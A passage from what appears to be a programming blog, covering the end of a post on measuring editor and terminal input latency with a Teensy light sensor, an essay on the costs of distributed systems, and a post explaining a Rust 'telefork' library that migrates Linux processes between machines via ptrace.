In both editors ‘aa’ causes the autocomplete popup to alternate between two lists and ‘a’ causes it to appear and disappear. I can guess that Sublime might be slower in the ‘a’ case because opening and closing the autocomplete popup has a cost, but I don’t have a strong hypothesis why VSCode is slower in the ‘aa’ case on both insertion and deletion.

Jittering so as not to sync with refresh

The next fishy thing I noticed is that my variances seemed too low. I was sometimes getting standard deviations of 1ms when my understanding of how the system worked said I should be getting a standard deviation over 4.6ms due to 16ms screen refresh intervals.

I looked at my code and figured out that I was inadvertently synchronizing my measurement with screen refreshes. Whenever I measured a change, my firmware would wait exactly 300ms before typing ‘a’ or backspace again and taking another measurement. This meant the input was always sent about 300ms after a screen refresh and thus would land at a fairly constant spot in the screen refresh interval. I patched this issue by adding a 50ms random delay between measurements.

This mainly leads to incorrectly low variances but might lead to incorrect averages as well if the app will miss a paint deadline if the input event comes late in a frame but it never does during the test. I found this during testing for this post and couldn’t be bothered to redo all the tests below this point, so you may notice some low variances, but I did recheck the averages on important results like Sublime and VSCode.

Text editors

I tested the latency of a bunch of text editors on the same plain text file, but note the above that these are before I added jittering, although I did more tests on Sublime and VSCode after jittering which you can see above.

lat i= 32.5 +/-   4.0, a= 34, d= 35 (n= 38,q= 78) |   9_          | sublime text
lat i= 33.4 +/-   1.4, a= 33, d= 33 (n= 68,q= 23) |  _9           | textedit
lat i= 47.6 +/-   7.0, a= 47, d= 47 (n= 71,q=130) |   219         | vscode
lat i= 34.2 +/-   3.5, a= 34, d= 33 (n= 57,q= 37) |   9 _         | chrome html input
lat i= 33.2 +/-   1.1, a= 33, d= 33 (n= 55,q= 30) |   9           | stock mac emacs
lat i= 45.6 +/-   7.0, a= 43, d= 41 (n= 35,q= 56) |   992_        | atom
lat i= 35.0 +/-   4.7, a= 35, d= 35 (n= 66,q= 11) |   9__         | xi

Given the lack of jitter, I’d interpret these results as everything except VSCode and Atom being similarly “basically as good as you can get”. And note that even VSCode and Atom have less of a latency penalty for normal typing than you can easily have in your monitor or keyboard.

Terminals

I also measured different terminals. It looks like the default Apple Terminal and kitty have similar approximately optimal latency, while iTerm2 and Alacritty have worse latency.

lat i= 53.1 +/-   6.6, a= 54, d= 55 (n= 53,q= 59) |    291      _ | iterm2 gpu render
lat i= 50.5 +/-   2.5, a= 50, d= 50 (n= 56,q= 59) |    19_        | iterm2 no gpu
lat i= 35.8 +/-   7.0, a= 34, d= 33 (n= 73,q= 48) |   9___        | apple terminal
lat i= 35.1 +/-   2.5, a= 34, d= 32 (n= 35,q= 52) |   9_          | apple terminal vim
lat i= 50.4 +/-   3.9, a= 50, d= 49 (n= 60,q=269) |   _59         | alacritty
lat i= 36.1 +/-   5.6, a= 35, d= 34 (n= 78,q=199) |   9__         | kitty

How to make one

Here’s the parts list I used:

$12: A Teensy LC or any other Teensy 3+. You could also use an Arduino, but the Teensy’s USB library uses 1000hz polling (1ms latency) while most USB devices default to 125hz (an extra 8ms of random latency in your measurements). It’s possible you may be able to get your microcontroller of choice to do 1000hz polling though. If you don’t want to have to solder the pins, buy one with pre-soldered pins, this might require getting the more expensive Teensy 3 if you want Amazon Prime shipping.
$12: A light sensor module (Amazon only has 10 packs, I only used 1). You could make your own circuit for this but these modules save a lot of time and are easy to integrate.
$13: A helping hand to hold the light sensor up to your screen in a stable position.
A button/switch of some kind to trigger testing
Wires to connect the light sensor, Teensy, and button
Electrical tape to make a black soft shield to restrict the view of the sensor
A USB micro-B cable to connect the Teensy to your computer

There’s an awful lot of flexibility in exactly how you assemble it. You just need to somehow connect 3 wires (3V, ground, analog out) from the light sensor module to the corresponding pins on the Teensy (3V, ground and any analog-capable pin). The easiest way to do this which doesn’t even require any soldering if you buy a Teensy with pre-soldered header pins is to use 3 female to female jumper wires. Then you just need some kind of switch to activate the latency test where you wire one pin to ground on the Teensy and another pin to a digital IO pin. This can be as simple as two wires that you touch together if you’re really lazy!

To make sure the light sensor module only sees a limited area of the screen I wrapped the sensor in a little cylinder of electrical tape and snipped off the end cleanly with scissors. This made a little round window I could press up against the screen with the helping hand to minimize outside interference and get the cleanest signal.

I had already made a foot pedal box with a Teensy LC and a little breadboard inside, and it had an extra TRRS jack on the side I had put on anticipating this sort of project, so for me the project was soldering the light sensor module to a TRRS cable. Then I could just use one of my existing foot pedals to control the testing!

For the soldering I was in luck since I had conveniently bought magnetic helping hands for the project which I could use for the soldering process. Inconveniently I realized that I actually didn’t own many substantial chunks of iron for them to attach to, so I ended up using a cast iron pan when soldering and my tungsten cube when on my desk (which turns out to be slightly ferromagnetic).

I encourage you to have fun and try to make something fancier than just dangling jumper wires. For my foot pedal box I bought a plastic project box from a local electronics shop, used a drill press to put some holes in the sides and installed large and small headphone jacks and a little breadboard so I could reconfigure how things connect. There’s tons of foot pedals on Amazon for tattoo machines and electric pianos that use 1/4” phone plugs that you can pick and choose from. These are my favorites for feel and silence but there are cheaper options that can be unreliable, hard to press or loud.

I wouldn’t recommend following my use of a TRRS jack for the sensor module though, they’re nice and small and there’s lots of cables available, but I used them before I realized the problem that they cause a lot of shorting of different connections when plugging and unplugging. I tried to minimize this by putting power and ground on opposite ends, but you should consider some better cable type like maybe a phone cable.

The firmware

I didn’t write the fanciest possible firmware to find the beginning and ending of the transition, but I put a bit of effort into tweaking it to work well and adding various features so I recommend starting with my firmware. Install the Teensyduino software and then you can use my latency tester Arduino sketch which also doubles as foot pedal box code but you can comment that stuff out and configure it to use the right pins. Then just long press your switch to take samples and short press to type out the results!

Fragile narrow laggy asynchronous mismatched pipes kill productivity

2020-05-17T00:00:00+00:00

Something I’ve been thinking about recently is how when I’ve worked on any kind of distributed system, including systems as simple as a web app with frontend and backend code, probably upwards of 80% of my time is spent on things I wouldn’t need to do if it weren’t distributed. I came up with the following description of why I think this kind of programming requires so much effort: Everything is fragile narrow laggy asynchronous mismatched untrusted pipes. I think every programmer who’s worked on a networked system has encountered each of these issues, this is just my effort to coherently describe all of them in one place. I hope to prompt you to consider all the different hassles at once and think about how much harder/easier your job would be if you did/didn’t have to deal with these things. I think this is part of why web companies like Twitter seem to have so much lower impressiveness per engineer productivity than other places like game companies or SpaceX, although there’s other pieces to that puzzle. While part of the difficulty of distributed systems is inherent in physics, I think there’s lots of ideas for making each part of the problem easier, many already in common use, and I’ll try to mention lots of them. I hope that we as programmers continually develop more of these techniques and especially general implementations that simplify a problem. Like serialization libraries reducing the need for hand-written parsers/writers, I think there’s a lot of developer time out there to save by implementing generalized solutions where we currently painstakingly reimplement common patterns. I also think all these costs mean you should try really hard to avoid making your system distributed if you don’t have to.

I’ll go over each piece in detail, but briefly, whenever we introduce a network connection we usually have to deal with something that is:

Fragile: The network connection or the other end can have hardware failures, these have different implications but both manifest as just a timeout. Everything needs to handle failure.
Narrow: Bandwidth is limited so we need to carefully design protocols to only send what they need.
Laggy: Network latency is noticeable so we need to carefully minimize round-trips.
Asynchronous: Especially with >2 input sources (UIs count) all sorts of races and edge cases can happen and need to be thought about and handled.
Mismatched: It’s often not possible to upgrade all systems atomically, so you need to handle different ends speaking different protocol versions.
Untrusted: If you don’t want everything to be taken down by one malfunction you need to defend against invalid inputs and being overwhelmed. Sometimes you also need to defend against actual attackers.
Pipes: Everything gets packed as bytes so you need to be able to (de)serialize your data.

All of these things can be mostly avoided when programming things that run on one computer, that is unless you end up optimizing performance and realizing your computer is actually a distributed system of cores and some of them come back. Some domains manage to avoid some of these but I’ve experienced subsets of these problems working on web apps, self-driving cars, a text editor, and high-performance systems, they’re everywhere.

This isn’t even all the problems, just things about the network. Tons of effort is also expended on things like how various bottlenecks often entail a complicated hierarchy of caches that need to be kept in sync with the underlying data store.

One way you can avoid all this is to just not write a distributed system. There are plenty of cases you can do this and I think it’s worthwhile to try way harder than some people do to pack everything into one process. However past a certain point of reliability or scale, physics means you’re going to have to use multiple machines (unless you want to go the mainframe route).

Fragile

As you connect machines or increase reliability goals, the strategy of just crashing everything when one piece crashes (what multi-threaded/multi-core systems do) becomes increasingly unviable. Hardware will fail, wireless connections drop, entire data centers have their power or network taken out by squirrels. Some domains like customers with flaky internet also inevitably entail frequent connection failure.

In practice you need to write code to handle the failure cases and think carefully about what they are and what to do. This gets worse when merely noting the failure would drop important data, and you need to implement redundancy of data storage or transmission. Even worse, both another machine failing and a network connection breaking become visible just as some expected network packet not arriving after “too long”, introducing not only a delay but an ambiguity that can result in split-brain issues. Often something like TCP implements it for you but sometimes you have to implement your own heartbeating to periodically check that another system is still alive.

Attempts to make this easier include exceptions, TCP, concensus protocols and off-the-shelf redundant databases, but no solution eliminates the problem everywhere. One of my favourite attempts is Erlang’s process linking, monitoring and supervising which offers a philosophy that attempts to coalesce all sorts of failures into one easier to handle general case.

Narrow

Network bandwidth is often limited, especially over consumer or cellular internet. It may seem like this isn’t a limitation very often because you rarely hit bandwidth limits, but that’s because limited bandwidth is ingrained into everything you do. Whenever you design a distributed system you need to come up with a communication protocol that communicates on the order of what’s necessary rather than on the order of the total size of your data.

In a multi-threaded program, you might just pass a pointer to gigabytes of immutable or locked data for a thread to read what it wants from and not think anything of it. In a distributed system passing the entire memory representing your database is unthinkable and you need to spend time implementing other approaches.

Although actually multi-core systems are a certain kind of distributed system and they employ protocols behind the scenes to transfer only the data that’s necessary, but involve many more broadcasts and round trips than would be viable with most networks. I actually think trying to apply techniques used to make multi-core machines seamless to distributed systems is a good way to think of neat solutions that might be much more general than you’d otherwise design. Similarly once you really start optimizing systems hard you notice that bandwidth inside your computer becomes a constraint too.

Dealing with low bandwidth usually involves a message type for each query or modification to a shared data structure, and deciding when to ship over more data so local interactions are faster, or less data to avoid terrible bandwidth cases. It often goes further to various types of replicated state machine where each peer updates a model based on a replicated stream of changes, because sending the new model after every update would be too much bandwidth. Examples of this include RTS games to exchange feeds. However maintaining determinism and consistency in how each peer updates its state to avoid desyncs can be tricky, especially if different peers have different languages or software versions. You also often end up implementing a separate protocol for streaming a full snapshot, because replaying events from the beginning of time when connecting isn’t viable.

Attempts to make this easier include RPC libraries just making it easier to send lots of different message types for different queries and updates rather than shipping data structures, caching libraries, and compression. Cool but less commonly used systems include things like Replicant that ensure synchronized state machine code and update streams on many devices to make replicated state machines easier and less fraught.

Laggy

One network round trip can’t be a problematic latency or you need better networking hardware or a different problem to solve. The difficulties come from avoiding implementing your solution in a way that needs too many network round trips. This can lead to needing to implement special combo-messages that do a sequence of operations on the server instead of just providing smaller primitive messages.

The web, with its especially large latencies, has had lots of problems of this type such as only having the font/image URLs after loading the HTML, or REST APIs that require multiple chained calls to get the IDs needed for the next. Lots of things have been built for these problems like resource inlining, HTTP/2 server push and GraphQL.

A cool somewhat general solution is Cap’n Proto promise pipelining and other systems that involve essentially shipping a chain of steps to perform to the other end (like SQL). These systems essentialy send a limited type of program to perform on the server. Unfortunately you often run into the limitations of the language used, like you can’t add 1 to your Cap’n Proto result before passing it to a new call without a round trip. But if you make your language too powerful you can run into problems with the code you’re shipping overloading the server or being too big. Just adding a multi-step message for your use case is pretty easy if you control both ends, but can be harder if the other end is a company’s API for third parties, or even just owned by a different team at a big company, and those are the cases where they tend not to want to run your programs on their server. I think there’s lots more avenue for exploration here in terms of new approaches to sending segments of code while re-using sent code to save bandwidth and limiting the potential for it to do damage.

Another solution that can work in a data center is to use better networking. You can get network cards with 2us latencies and 100Gbps bandwidths or better, but basically only HPC, simulations and finance use them. However these just reduce the constant factor and don’t save you if your approach takes O(n) round trips.

Asynchronous

As soon as you have 2+ sources of events that aren’t synchronized then you start worrying about race conditions. This can be multiple servers, or just a web app with both user input and a channel to the server. There’s always uncommon orderings like the user clicking the “Submit” button a second time before the next page loads. Sometimes you get lucky and the design of your system means that’s fine, other times it’s not and you either fix it to handle that case or get bug reports from customers who were billed twice. The more asynchrony the more cases you have to either think about or solve with an elegant design which precludes bad states.

Depending on your language/framework, asynchrony can also entail a change to the way you normally write code that makes everything bloated and uglier. Lots of systems used to and still do require you to use callbacks everywhere, sometimes without even providing you closures, making your code an enormous mess. Many languages have gotten better at this with features like async/await or coroutines with small stack like Go, or just using threads and blocking I/O. Unfortunately some of these solutions introduce function color problems where introducing asynchrony requires making changes throughout your codebase.

Asynchrony edge cases are a reasonably fundamental problem, but there’s lots of available patterns for solving different kinds of asynchrony. Examples include concurrency primitives like locks and barriers, protocol design ideas like idempotency, and fancier things like CRDTs.

Mismatched

Usually it’s not possible to upgrade every component of a distributed system atomically when you want to change a protocol. This runs from communicating server clusters that must run 24/7 to users who have an old version of your web page loaded in a tab. This means for some time you’ll have systems that want to talk a newer protocol version communicating with systems that only know an older protocol. This is just a problem you need to solve and there’s two broad classes of common solutions with many subtypes:

Have the new software version be able to speak both the old and new protocol version and negotiate to use the new version with upgraded peers, either by maintaining both implementations or mapping the old handlers onto the new ones.
Use data structures that provide some degree of compatibility for free, then only upgrade your protocol in those ways. For example unrecognized fields in JSON objects are usually ignored so can be used for new functionality when recognized. Migrations can usually add new columns to a database table without it breaking queries. Then you usually go to great lengths to shoehorn every change into being this type of compatible.

The problem with both these cases is the first steps usually accumulate technical debt in the form of code paths to handle cases (for example of missing fields) that will never come up once all peers are upgraded past the protocol change. This usually entails multi-stage rollouts, for example introduce a new field as optional, roll out the new version everywhere, change the field to be mandatory now that all clients send it, do another rollout. I’ve definitely spent a lot of time planning multi-stage rollouts when I’ve wanted to change protocols used by multiple systems without leaving a mess.

There’s lots of things that help with both of these approaches, both serialization systems that provide lots of compatible upgrade paths like Protobufs, to various patterns for deserializing/upgrading old type versions.

Untrusted

Not only can your data fail to arrive but your system can recieve data that might actively harm it. Systems have bugs which cause invalid messages to be sent, so inputs need to be carefully validated and errors returned, not only at the serialization level but the business logic level. Bugs or new loads can cause systems to send messages faster than they can be handled, necessitating backpressure and limits. You may even have to defend against attackers who actively try and subvert your system by sending messages that would never be sent by your usual counterparties and intelligently seek out edge cases.

Here too we have lots of patterns including rate limits, field validation logic and channels with built in backpressure. On the security side we also have a field of things like encryption, certificates and fuzzing. We’ve also gotten better at being general here as we’ve reduced prevalence of manual patterns like ensuring we always escape interpolated strings in SQL and HTML, with more general patterns like ? query parameters and templating systems which always apply escaping.

Pipes

Last and mostly least, everything has to be a stream of bytes or packets of bytes. This means you need to take your nice data structures that your language makes easy to manipulate and pack them into a different form from their in-memory representation in order to send on the wire. Luckily except in very few places easy serialization/RPC libraries have made this pretty easy, if occasionally somewhat slow. You can also sometimes use methods that allow you to pick out exactly the parts you want from the byte buffers without transforming it to a different representation, perhaps by casting your buffer pointer to a C structure pointer (when that’s even close to safe-ish), or using something like Cap’n Proto that can generate accessors.

This is probably the one I’ve spent the least time fighting, but one case I can remember was when I wanted to send a large data structure, but the available serialization system could only serialize it all at once rather than streaming it packet by packet as the socket could accept it, and I didn’t want to block my server for a long time doing the entire thing, creating tail latency. I ended up choosing a different design, but I could also have written custom code to break my data structure up into chunks and send it a little bit at a time.

Conclusion

I suspect many responses to this post will be of the form “Actually {some/all of these problems} are trivial if you just {do some thing that isn’t universally applicable, is time consuming or has its own issues, possibly something I mentioned, if so probably using Erlang} and the real problem is that other people are bad at programming unlike people in the good old days”. There are lots of things that help, and there is a skill component in knowing about good solutions, choosing the right ones, and implementing them effectively. However these are still hard problems and people have to make difficult real tradeoffs because we haven’t solved them effectively enough. Maybe you would have taken a different side of the tradeoff but people make these technology decisions for real reasons and we should strive to reduce the costs, as well as improving decisions over which costs we accept.

I just can’t use Erlang for most projects I do because they require either extremely low latency, integration with some part of a non-Erlang ecosystem, or they’re too computationally intensive (yes I know about NIFs). This means there’s ample opportunity for productivity improvements just by bringing solutions from one domain and implementing them in another domain or making them faster! I love seeing efforts to bring Erlang’s benefits to more areas. And even Erlang doesn’t solve all of these problems to the extent I believe it’s possible to one day address them.

I think one of the real biggest hammers you can take to these problems is just to try really hard to avoid writing a distributed system in the first place. One of my goals for this post is to inspire people to try to develop more general solutions instead of having to repeatedly implement specific patterns, but my other goal is to try and put all the costs in your face at once and say are you sure adding that separate networked system will really make your job easier? Sometimes a distributed system is unavoidable, such as if you want extreme availability or computing power, but other times it’s totally avoidable. To pick specific examples:

I think people should be more willing to try and write performance-sensitive code as a (potentially multi-threaded) process on one machine in a fast language if it’ll fit rather than try and distribute a slower implementation over multiple machines. I acknowledge that this takes time and effort to learn how to do and optimize, but it’ll pay off in a simpler system.
- In particular I think people should be more aggressive about trying to use multi-threading on a really big computer when possible. I personally find multi-threaded programming in Rust way easier than parallelizing with multiple processes when it’s viable. Some problems like asynchrony are similar but others like serialization, latency and bandwidth largely go away except at performance levels way higher than you’d probably get out of a hypothetical distributed version.
I think people should be more willing to use C FFI to bind to libraries in other languages rather than putting them in a separate networked service (example picking on users of my own library, although I don’t actually know what their constraints were). Yes you have to learn how to do C FFI and deal with unsafety, but I’d take that trade to avoid the network service.
There are reasons people choose to split things into separate services other than availability and parallelism. For example ability to deploy updates quickly without coordinating with another team, fast CI, using a different language, isolation.
- We should build more alternatives that don’t involve separate systems, like tools for using auto-updating hot-reloaded dynamically linked libraries with sandboxing instead of microservices (eliminating “narrow”, “laggy” and “asynchronous”). I’m pretty sure at least one instance of hot-reloading dylib updates pushed over the network exists (I’d appreciate links!) but we’re far from availability of excellent implementations in many languages and in the mean time it isn’t a viable alternative for most people considering adding a microservice to build this themselves.
- Better tools for continuous integration, continuous deployment, isolation, and monorepos can reduce the incentive to split off services to reduce iteration cycle time.

I follow Jonathan Blow’s Twitter and streams and end up with mixed feelings. On the one hand I resonate with his feeling that modern software is way more complex than it needs to be and like the aesthetic and focus on performance and compile time power embodied in his language. On the other hand when he rants about how modern programmers just don’t know how to do things the Good Old Ways™ and need to stop making terrible design choices to be productive, I can’t help but think back to how I as one person have both been what he considers terribly unproductive working on web systems, and productive and effective when writing fast systems in his preferred style. It’s not that I just made terrible decisions sometimes but not other times, or was unaware of systems programming or data oriented design, it’s that I was facing different tradeoffs that forced me to make a distributed system and face a bunch of unproductive challenges that aren’t fully solved. The distributed systems I work on nowadays are low level, very fast, minimize layers of complexity, and my coworkers are extremely skilled. If anything, I’m less productive per similar-sounding feature when I work on these distributed systems than I was when I was programming in Ruby on Rails, because there’s less available tooling than for Rails. Most of my effort still goes into addressing the same distributed systems problems, which you just have to deal with less when programming a game. I agree with him that it’s totally possible for things to be better and dramatically less complex, but people decide to use established technologies because they don’t have the luxury of taking the time to write their ideal platform from scratch first. That’s why I’m so excited when people like him work to develop new tools like his language. I think even if everybody suddenly knew all his favorite game developer skills, more people would have the ability to build new types of tools, but until those tools were built, creating distributed systems would remain hard and unproductive. Also to make sure I tick off Blow fans and haters alike I should say that I recommend watching some of his streams, I think he’s really interesting, skilled and worth listening to, despite his abrasiveness and strong opinions. I find “what about this design would Jonathan Blow yell about being terrible” a good lens to help me come up with interesting alternatives.

Anyhow, I hope this leads you to think about the ways that your work could be more productive if you had better tools to deal with distributed systems, and what those might be. Alternatively I hope it prompts you to seriously consider the costs of writing distributed systems and what you can do to bend all the tradeoffs in your area of the programming world more towards non-distributed systems. Also try to think about what reasons people might not appear to you to be as good at developing software as you are with your Chosen Technology™ and how you can understand the constraints and tradeoffs they are dealing with and what solutions might shift the balance.

Teleforking a process onto a different computer!

2020-04-18T00:00:00+00:00

One day a coworker mentioned that he was thinking about APIs for distributed compute clusters and I jokingly responded “clearly the ideal API would be simply calling telefork() and your process wakes up on every machine of the cluster with the return value being the instance ID”. I ended up captivated by this idea: I couldn’t get over how it was clearly silly, yet way easier than any remote job API I’d seen, and also seemingly not a thing computers could do. I also kind of knew how I could do it, and I already had a good name which is the hardest part of any project, so I got to work.

In one weekend I had a basic prototype, and in another weekend I had a demo where I could telefork a process to a giant VM in the cloud, run a path tracing render job on lots of cores, then telefork the process back, all wrapped in a simple API.

Here’s a video of it running a render on a 64 core cloud VM in 8 seconds (plus 6s each for the telefork there and back). The same render takes 40s running locally in a container on my laptop:

Sorry, your browser doesn't support embedded videos.

How is it possible to teleport a process? That’s what this article is here to explain! The basic idea is that at a low level a Linux process has only a few different parts, and for each of them you just need a way to retreive it from the donor, stream it over the network, and copy it into the cloned process.

You may be thinking, “but wait, how can you replicate [some reasonable thing like a TCP connection]?” Basically I just don’t replicate tricky things so that I could keep it simple, meaning it’s just a fun tech demo you probably shouldn’t use for anything real. It can still teleport a broad class of mostly computational programs though!

What does it look like

I wrote it as a Rust library but in theory you could wrap it in a C API and then use it via FFI bindings to teleport even a Python process. The implementation is only about 500 lines of code (plus 200 lines of comments) and you use it like this:

use telefork::{telefork, TeleforkLocation};

fn main() {
    let args: Vec<String> = std::env::args().collect();
    let destination = args.get(1).expect("expected arg: address of teleserver");

    let mut stream = std::net::TcpStream::connect(destination).unwrap();
    match telefork(&mut stream).unwrap() {
        TeleforkLocation::Child(val) => {
            println!("I teleported to another computer and was passed {}!", val);
        }
        TeleforkLocation::Parent => println!("Done sending!"),
    };
}

I also provide a helper called yoyo that teleforks to a server, executes a closure you give it, then teleforks back. This provides the illusion that you can easily run a snippet of code on a remote server, perhaps one with much more compute power available.

// load the scene locally, this might require loading local scene files to memory
let scene = create_scene();
let mut backbuffer = vec![Vec3::new(0.0, 0.0, 0.0); width * height];
telefork::yoyo(destination, || {
  // do a big ray tracing job on the remote server with many cores!
  render_scene(&scene, width, height, &mut backbuffer);
});
// write out the result to the local file system
save_png_file(width, height, &backbuffer);

Anatomy of a Linux process

Let’s look at what a process on Linux (the OS telefork works on) looks like:

Memory mappings: These specify the ranges of bytes from the space of possible memory addresess that our program is using, composed of “pages” of 4 kilobytes. You can inspect them for a process using the /proc/<pid>/maps file. These contain both all the executable code of our program as well as the data it is working with.
- There are a few different types of these but we can treat these as just ranges of bytes that need to be copied and recreated at the same place (with the exception of some special ones).
Threads: A process can have multiple threads executing simultaneously on the same memory. These have ids and maybe some other state but when they’re paused they’re mainly described by the registers of the processor corresponding to the point of execution. Once we have all the memory copied we can just copy the register contents over into a thread on the destination process and then resume it.
File descriptors: The operating system has a table mapping ordinary integers to special kernel resources. You can do things with these resources by passing those integers to syscalls. There are a whole bunch of different types of resources these file descriptors can point to and some of them like TCP connections can be tricky to clone.
- I just gave up on this part and don’t handle them at all. The only ones that work are stdin/stdout/stderr since those are always mapped to 0, 1 and 2 for you.
- That doesn’t mean it’s not possible to handle them, it just would take some extra work I’ll talk about later.
Miscellaneous: There’s some other miscellaneous pieces of process state that vary in difficulty to replicate and most of the time aren’t important. Examples include the brk heap pointer. Some of these are only possible to restore using weird tricks or special syscalls like PR_SET_MM_MAP that were added by other restoration efforts.

So we can make a basic telefork implementation by just figuring out how to recreate the memory mappings and main thread registers. This should handle simple programs that mostly do computation without interacting with OS resources like files (in a way that needs to be teleported, opening a file on one system and closing it before calling telefork is fine).

How to telefork a process

I wasn’t the first to think of the possibility of recreating a process on another machine. I emailed @rocallahan, the author of the rr record and replay debugger to ask some questions since rr does some very similar things to what I wanted to do. He let me know of the existence of CRIU, which is an existing system that can stream a Linux process to a different system, designed for live migrating containers between hosts. CRIU supports restoring all sorts of file descriptors and other state, however the code was really complex and used lots of syscalls that required special kernel builds or root permissions. Linked from the CRIU wiki page I found DMTCP which was built for snapshotting distributed supercomputer jobs so they could be restarted later, and it had easier to follow code.

These didn’t dissuade me from trying to implement my own system since they’re super complex and require special runners and infrastructure, and I wanted to show how simple a basic teleport can be and make it just a library call. So I read pieces of source code from rr, CRIU, DMTCP, and some ptrace examples, and put together my own telefork procedure. My method works in its own way that’s a hodgepodge of different techniques.

In order to teleport a process, there’s both work that needs to be done in the source process which calls telefork, and at the call to the function which receives a streamed process on the server and recreates it from the stream (telepad). These can happen concurrently, but it’s also possible to do all the serializing before loading, for example by dumping to a file then loading later.

Below is a simplified overview of both processes, if you want to know exactly how everything happens I encourage you to read the source. It’s heavily commented, all in one file, and ordered so you can read it top to bottom to understand how everything works.

Sending a process using `telefork`

The telefork function is given a writeable stream over which it sends all the state of its process.

Fork the process into a frozen child. It can be hard for a process to inspect its own state since as it inspects the state things like the stack and registers change. We can avoid this by using a normal Unix fork and then have the child stop itself so we can inspect it.
Inspect the memory mappings. This can be done by parsing /proc/<pid>/maps to find out where all the memory maps are. I used the proc_maps crate for this.
Send the info for special kernel maps. Based on what DMTCP does, instead of copying the contents of special kernel maps we remap them, and this is best done before the rest of the mapping so we stream them first without their contents. These special maps like [vdso] are used to make certain syscalls like getting the time faster.
Loop over the other memory maps and stream them to the provided pipe. I first serialize a structure containing info about the mapping and then I loop over the pages in it and use the process_vm_readv syscall to copy memory from the child to a buffer, then write that buffer to the channel.
Send the registers. I use the PTRACE_GETREGS option for the ptrace syscall, which allows me to get all register values of the child process. Then I just write them in a message over the pipe.

Running syscalls in a child process

In order to mold a target process into a copy of the incoming process we’ll need to get the process to execute a bunch of syscalls on itself without having access to any code, because we’ve deleted it all. Here’s how I do remote syscalls using ptrace, which is a versatile syscall for manipulating and inspecting other processes:

Find a syscall instruction. You need at least one syscall instruction for the child to execute to be in an executable mapping. Some people patch one in, but instead I use process_vm_readv to read the first page of the kernel [vdso] mapping, which as far as I know contains at least one syscall in all Linux versions so far, and then search through the bytes for its offset. I only do this once and update it when I move the [vdso] mapping.
Set up the registers to execute a syscall using PTRACE_SETREGS. The instruction pointer points to the syscall instruction, rax holds the Linux syscall number, and rdi, rsi, rdx, r10, r8, r9 hold the arguments.
Step the process one instruction using the PTRACE_SINGLESTEP option to execute the syscall instruction.
Read the registers using PTRACE_GETREGS to retreive the syscall return value and see if it succeeded.

Receiving a process using `telepad`

Using this primitive and ones I’ve already described we can recreate the process:

Fork a frozen child. Similar to sending except this time we need a child process we can manipulate to turn it into a clone of the process being streamed in.
Inspect the memory mappings. This time we need to know all the existing memory maps so we can remove them to make room for the incoming process.
Unmap the existing mappings. We loop over each of the mappings and manipulate the child process into calling munmap on them.
Remap the special kernel mappings. Read their destinations from the stream and use mremap to remap them to their target destination.
Stream in the new mappings. Use remote mmap to create the mappings, then process_vm_writev to stream memory pages into them.
Restore the registers. Use PTRACE_SETREGS to restore the registers for the main thread that were sent over, with the exception of rax which is the return value for the raise(SIGSTOP) that the snapshotted process stopped on, which we overwrite with an arbitrary integer passed to telepad.
- The arbitrary value is used so the telefork server can pass the file descriptor of the TCP connection the process came in on, so that it can send data back, or in the case of yoyo execute a telefork back over the same connection.
Restart the process with its brand new contents by using PTRACE_DETACH.

Doing more things properly

There’s a few things that are still broken in my implementation of telefork. I know how to fix them all, but I’m satisfied with how much I’ve implemented and sometimes they’re tricky to fix. This describes a few interesting examples of those things:

Handling the vDSO properly. I mremap the vDSO in the same way that DMTCP does but that turns out to work only when restoring on the exact same kernel build. Copying the vDSO contents instead can work accross different builds of the same version, which is how I got my path tracing demo to work since getting the number of CPU cores in glibc checks the current time using the vDSO in order to cache the count. However the way to actually do it properly is to either patch all the vDSO functions to just execute syscall instructions like rr does, or to patch each vDSO function to jump to the vDSO function from the donor process.
Restoring brk and other miscellaneous state. I tried to use a method from DMTCP to restore the brk pointer but it only works if the target brk is greater than the donor’s brk. The correct way to do it that also restores other things is PR_SET_MM_MAP, but that requires elevated permissions and a kernel build flag.
Restoring thread local storage. Thread local storage in Rust seems to just work™ presumably because the FS and GS registers are restored, but there’s apparently some kind of glibc cache of the pid and tid that might mess up a different kind of thread local storage. One solution CRIU can do using fancy namespaces is restore the process with the same PID and TIDs.
Restore some file descriptors. This could be done either using individual strategies for each type of file descriptor, like checking if a file with the same name/contents exists on the destination system, or forwarding all reads/writes to the process source system using FUSE. However it’s a ton of effort to support all the types of file descriptors, like running TCP connections, so DMTCP and CRIU just painstakingly implement the most common types and give up on things like perf_event_open handles.
Handling multiple threads. Normal Unix fork() doesn’t do this, but it should just involve stopping all threads before the memory streaming, then copying their registers and reinstating them in threads in the cloned process.

Even crazier ideas

I think this shows that some crazy things you might have thought weren’t possible can in fact be done given the right low level interfaces. Here’s some ideas extending on the basic telefork ideas that are totally possible to implement, although perhaps only with a very new or patched kernel:

Cluster telefork. The original inspiration for telefork was the idea of streaming a process onto every machine in a compute cluster. You could maybe even use UDP multicast or peer-to-peer techniques to make the distribution of memory to the whole cluster faster. You probably also want to provide communication primitives.
Lazy memory streaming. CRIU submitted patches to the kernel to add something called userfaultfd that can catch page faults and map in new pages more efficiently than SIGSEGV handlers and mmap. This can let you stream in new pages of memory only as they are accessed by the program, allowing you to teleport processes with lower latency since they can start running basically right away.
Remote threads! You could transparently make a process think it was running on a machine with a thousand cores. You could use userfaultfd plus a patch set for userfaultfd write protection which was just merged earlier this month to implement a cache-coherency algorithm like MESI to replicate the process memory across a cluster of machines efficiently such that memory would only need to be transferred when one machine read a page another wrote to since its last read. Then threads are just sets of registers that are very cheap to distribute across machines by swapping them into the registers of pools of kernel threads, and intelligently rearrange so they’re on the same machine as other threads they communicate with. You could even make syscalls work by pausing on syscall instructions, transferring the thread to the original host machine, executing the syscall, then transferring back. This is basically the way your multi-core or multi-socket CPU works except using pages instead of cache lines and the network instead of buses. The same techniques like minimizing sharing between threads that work for multi-core programming would make programs run efficiently here. I think this could actually be very cool, although it might need more kernel support to work seamlessly, but it could allow you to program a distributed cluster the same way you program a many-core machine and (with a bunch of optimization tricks I haven’t yet written about) have it be competitively efficient with the distributed system you otherwise would have written.

Conclusion

I think this stuff is really cool because it’s an instance of one of my favourite techniques, which is diving in to find a lesser-known layer of abstraction that makes something that seems nigh-impossible actually not that much work. Teleporting a computation may seem impossible, or like it would require techniques like serializing all your state, copying a binary executable to the remote machine, and running it there with special command line flags to reload the state. But underneath your favourite programming language there’s a layer of abstraction where you can choose a fairly simple subset of things that make it possible to teleport at least most pure computations in any language in 500 lines of code and a single weekend. I think this kind of diving down often leads to solutions that are simpler and more universal. Another one of my projects like this is Numderline.

